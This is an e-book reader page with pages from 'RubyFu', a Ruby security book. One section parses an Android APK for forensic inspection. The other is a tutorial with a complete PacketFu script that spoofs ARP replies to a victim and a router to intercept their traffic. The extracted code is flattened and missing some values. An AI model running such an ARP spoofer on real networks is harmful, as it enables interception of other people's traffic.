• Complain

it-ebooks - RubyFu

Here you can read online it-ebooks - RubyFu full text of the book (entire story) in english for free. Download pdf and epub, get meaning, cover and reviews about this ebook. year: 2018, publisher: iBooker it-ebooks, genre: Computer. Description of the work, (preface) as well as reviews are available. Best literature library LitArk.com created for fans of good reading and offers a wide selection of genres:

Romance novel Science fiction Adventure Detective Science History Home and family Prose Art Politics Computer Non-fiction Religion Business Children Humor

Choose a favorite category and find really read worthwhile books. Enjoy immersion in the world of imagination, feel the emotions of the characters or learn something new for yourself, make an fascinating discovery.

it-ebooks RubyFu
  • Book:
    RubyFu
  • Author:
  • Publisher:
    iBooker it-ebooks
  • Genre:
  • Year:
    2018
  • Rating:
    5 / 5
  • Favourites:
    Add to favourites
  • Your mark:
    • 100
    • 1
    • 2
    • 3
    • 4
    • 5

RubyFu: summary, description and annotation

We offer to read an annotation, description, summary or preface (depends on what the author of the book "RubyFu" wrote himself). If you haven't found the necessary information about the book — write in the comments, we will try to find it.

it-ebooks: author's other books


Who wrote RubyFu? Find out the surname, the name of the author of the book and a list of all author's works by series.

RubyFu — read online for free the complete book (whole text) full work

Below is the text of the book, divided by pages. System saving the place of the last page read, allows you to conveniently read the book "RubyFu" online for free, without having to search again every time where you left off. Put a bookmark, and you can go to the page where you finished reading at any time.

Light

Font size:

Reset

Interval:

Bookmark:

Make
Table of Contents
  1. 1.1
    1. 1.1.1
    2. 1.1.2
    3. 1.1.3
  2. 1.2
    1. 1.2.1
      1. 1.2.1.1
      2. 1.2.1.2
    2. 1.2.2
  3. 1.3
    1. 1.3.1
      1. 1.3.1.1
    2. 1.3.2
    3. 1.3.3
    4. 1.3.4
      1. 1.3.4.1
      2. 1.3.4.2
    5. 1.3.5
  4. 1.4
    1. 1.4.1
    2. 1.4.2
    3. 1.4.3
    4. 1.4.4
    5. 1.4.5
    6. 1.4.6
      1. 1.4.6.1
    7. 1.4.7
      1. 1.4.7.1
    8. 1.4.8
      1. 1.4.8.1
    9. 1.4.9
    10. 1.4.10
      1. 1.4.10.1
      2. 1.4.10.2
      3. 1.4.10.3
  5. 1.5
    1. 1.5.1
    2. 1.5.2
    3. 1.5.3
    4. 1.5.4
    5. 1.5.5
      1. 1.5.5.1
      2. 1.5.5.2
        1. 1.5.5.2.1
        2. 1.5.5.2.2
        3. 1.5.5.2.3
    6. 1.5.6
    7. 1.5.7
  6. 1.6
    1. 1.6.1
    2. 1.6.2
    3. 1.6.3
      1. 1.6.3.1
      2. 1.6.3.2
      3. 1.6.3.3
        1. 1.6.3.3.1
        2. 1.6.3.3.2
        3. 1.6.3.3.3
    4. 1.6.4
  7. 1.7
    1. 1.7.1
    2. 1.7.2
    3. 1.7.3
    4. 1.7.4
    5. 1.7.5
  8. 1.8
  9. 1.9
  10. 1.10
    1. 1.10.1
Android Forensic
Android Forensic
Parsing APK file

Our example will be on DIVA (Damn insecure and vulnerable App) APK file. You can download the file from here.

Note: Some methods may not return the expected output because the missing information in the apk, e.g. the suggested apk doesn't have icon and signs but you can download some known apk like twitter apk or so and test it, it works.

We'll use ruby_apk gem to do that

  • Install ruby_apk gemgem install ruby_apk

Now, lets start parsing

require 'ruby_apk' apk = Android: :Apk .new( 'diva-beta.apk' ) # listing files in apk apk.each_file do |name, data| puts " #{name} : #{data.size} bytes" # puts file name and data size end # Extract icon data in Apk icons = apk.iconicons.each do |name, data| File.open(File.basename(name), 'wb' ) {|f| f.write data } # save to file. end # Extract signature and certificate information from Apk signs = apk.signs # retrun Hash(key: signature file path, value: OpenSSL::PKCS7) signs.each do |path, sign| puts path puts sign end # Manifest ## Get readable xml manifest = apk.manifestputs manifest.to_xml ## Listing components and permissions manifest.components.each do |c| # 'c' is Android::Manifest::Component object puts " #{c.type} : #{c.name} " c.intent_filters.each do |filter| puts "\t #{filter.type} " end end ## Extract application label string puts apk.manifest.label # Resource ## Extract resource strings from apk rsc = apk.resourcersc.strings.each do |str| puts str end ## Parse resource file directly rsc_data = File.open( 'resources.arsc' , 'rb' ).read{|f| f.read }rsc = Android: :Resource .new(rsc_data) # Resolve resource id rsc = apk.resource ## assigns readable resource id puts rsc.find( '@string/app_name' ) # => 'application name' ## assigns hex resource id puts rsc.find( '@0x7f040000' ) # => 'application name' ## you can set lang attribute. puts rsc.find( '@0x7f040000' , :lang => 'ja' ) # Dex ## Extract dex information dex = apk.dex ### listing string table in dex dex.strings.each do |str| puts str end ### listing all class names dex.classes.each do |cls| # cls is Android::Dex::ClassInfo puts "class: #{cls.name} " cls.virtual_methods.each do |m| # Android::Dex::MethodInfo puts "\t #{m.definition} " # puts method definition end end ## Parse dex file directly dex_data = File.open( 'classes.dex' , 'rb' ).read{|f| f.read }dex = Android: :Dex .new(dex_data)
ARP Spoofing
ARP Spoofing

As you know, ARP Spoofing attack in the core of MitM attacks. In this part we'll know how to write simple and effective ARP spoofer tool to use it in later spoofing attacks.

Scenario

We have 3 machines in this scenario as shown below.

|Attacker| | |Victim| -----------------> |Router| ---> Internet

Here the list of IP and MAC addresses of each of theme in the following table

Host/InfoIP AddressMAC Address
Attacker192.168.0.1003C:77:E6:68:66:E9
Victim192.168.0.2100:0C:29:38:1D:61
Router192.168.0.100:50:7F:E6:96:20

To know our/attacker's interface information

info = PacketFu: :Utils .whoami?( :iface => "wlan0" )

returns a hash

{:iface=>"wlan0", :pcapfile=>"/tmp/out.pcap", :eth_saddr=>"3c:77:e6:68:66:e9", :eth_src=>""192.168.0.13", :ip_src=>3232235533, :ip_src_bin=>"\xC0\xA8\x00\r", :eth_dst=>"\x00P\x7F\xE6\x96 ", :eth_daddr=>"00:50:7f:e6:96:20"}

So you can extract these information like any hash info[:iface], info[:ip_saddr], info[:eth_saddr], etc..

Building victim's ARP packet

# Build Ethernet header arp_packet_victim = PacketFu: :ARPPacket .newarp_packet_victim.eth_saddr = "3C:77:E6:68:66:E9" # our MAC address arp_packet_victim.eth_daddr = "00:0C:29:38:1D:61" # the victim's MAC address # Build ARP Packet arp_packet_victim.arp_saddr_mac = "3C:77:E6:68:66:E9" # our MAC address arp_packet_victim.arp_daddr_mac = "00:0C:29:38:1D:61" # the victim's MAC address arp_packet_victim.arp_saddr_ip = "192.168.0.1" # the router's IP arp_packet_victim.arp_daddr_ip = "192.168.0.21" # the victim's IP arp_packet_victim.arp_opcode = # arp code 2 == ARP reply

Building router packet

# Build Ethernet header arp_packet_router = PacketFu: :ARPPacket .newarp_packet_router.eth_saddr = "3C:77:E6:68:66:E9" # our MAC address arp_packet_router.eth_daddr = "00:0C:29:38:1D:61" # the router's MAC address # Build ARP Packet arp_packet_router.arp_saddr_mac = "3C:77:E6:68:66:E9" # our MAC address arp_packet_router.arp_daddr_mac = "00:50:7F:E6:96:20" # the router's MAC address arp_packet_router.arp_saddr_ip = "192.168.0.21" # the victim's IP arp_packet_router.arp_daddr_ip = "192.168.0.1" # the router's IP arp_packet_router.arp_opcode = # arp code 2 == ARP reply

Run ARP Spoofing attack

# Send our packet through the wire while true sleep puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip} " arp_packet_victim.to_w(info[ :iface ]) puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip} " arp_packet_router.to_w(info[ :iface ]) end

Source

Wrapping all together and run as root

#!/usr/bin/env ruby # # ARP Spoof Basic script # require 'packetfu' attacker_mac = "3C:77:E6:68:66:E9" victim_ip = "192.168.0.21" victim_mac = "00:0C:29:38:1D:61" router_ip = "192.168.0.1" router_mac = "00:50:7F:E6:96:20" info = PacketFu: :Utils .whoami?( :iface => "wlan0" ) # # Victim # # Build Ethernet header arp_packet_victim = PacketFu: :ARPPacket .newarp_packet_victim.eth_saddr = attacker_mac # attacker MAC address arp_packet_victim.eth_daddr = victim_mac # the victim's MAC address # Build ARP Packet arp_packet_victim.arp_saddr_mac = attacker_mac # attacker MAC address arp_packet_victim.arp_daddr_mac = victim_mac # the victim's MAC address arp_packet_victim.arp_saddr_ip = router_ip # the router's IP arp_packet_victim.arp_daddr_ip = victim_ip # the victim's IP arp_packet_victim.arp_opcode = # arp code 2 == ARP reply # # Router # # Build Ethernet header arp_packet_router = PacketFu: :ARPPacket .newarp_packet_router.eth_saddr = attacker_mac # attacker MAC address arp_packet_router.eth_daddr = router_mac # the router's MAC address # Build ARP Packet arp_packet_router.arp_saddr_mac = attacker_mac # attacker MAC address arp_packet_router.arp_daddr_mac = router_mac # the router's MAC address arp_packet_router.arp_saddr_ip = victim_ip # the victim's IP arp_packet_router.arp_daddr_ip = router_ip # the router's IP arp_packet_router.arp_opcode = # arp code 2 == ARP reply while true sleep puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip} " arp_packet_victim.to_w(info[ :iface ]) puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip} " arp_packet_router.to_w(info[ :iface ]) end
Next page
Light

Font size:

Reset

Interval:

Bookmark:

Make

Similar books «RubyFu»

Look at similar books to RubyFu. We have selected literature similar in name and meaning in the hope of providing readers with more options to find new, interesting, not yet read works.


Reviews about «RubyFu»

Discussion, reviews of the book RubyFu and just readers' own opinions. Leave your comments, write what you think about the work, its meaning or the main characters. Specify what exactly you liked and what you didn't like, and why you think so.